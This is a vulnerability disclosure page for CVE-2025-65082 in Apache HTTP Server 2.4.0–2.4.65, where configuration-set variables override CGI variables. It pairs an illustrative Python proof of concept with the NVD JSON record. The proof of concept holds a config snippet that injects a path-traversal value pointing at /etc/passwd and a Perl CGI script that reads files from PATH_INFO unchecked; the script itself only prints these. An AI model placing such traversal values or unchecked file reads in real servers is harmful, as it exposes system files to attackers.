CVE-2025-65082

# CVE-2025-65082 PoC - Apache HTTP Server Environment Variable Override # This PoC demonstrates how malicious Apache config can override CGI variables # Malicious Apache configuration snippet malicious_config = ''' # Override server-calculated CGI variables SetEnv PATH_INFO /../../etc/passwd SetEnv SCRIPT_NAME /malicious/path SetEnv QUERY_STRING maliciouseval=true SetEnv HTTP_HOST attacker-controlled-host # Enable CGI execution for malicious scripts <Directory "/var/www/html"> Options +ExecCGI AddHandler cgi-script .cgi .pl .sh </Directory> ''' # Example CGI script that could be exploited cgi_exploit_example = '''#!/usr/bin/perl # CGI script vulnerable to environment variable injection use CGI qw(:standard); # Server variables that could be overridden my $script_name = $ENV{'SCRIPT_NAME'}; my $path_info = $ENV{'PATH_INFO'}; # If attacker overrides PATH_INFO, could lead to path traversal open(my $fh, '<', "/var/www/html$path_info") or die $!; ''' print('[+] CVE-2025-65082: Environment Variable Override PoC') print('[+] Target: Apache HTTP Server 2.4.0 - 2.4.65') print('[+] Attack Vector: Malicious Apache configuration') print('[+] Impact: CGI variable manipulation leading to security bypass')

{"cve": {"id": "CVE-2025-65082", "sourceIdentifier": "[email protected]", "published": "2025-12-05T11:15:52.497", "lastModified": "2025-12-10T16:39:56.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache HTTP Server through environment variables set via the Apache configuration unexpectedly superseding variables calculated by the server for CGI programs.\n\nThis issue affects Apache HTTP Server from 2.4.0 through 2.4.65.\n\nUsers are recommended to upgrade to version 2.4.66 which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-150"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.4.66", "matchCriteriaId": "2E190AC9-8786-444C-877C-DE4BC272331F"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/04/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}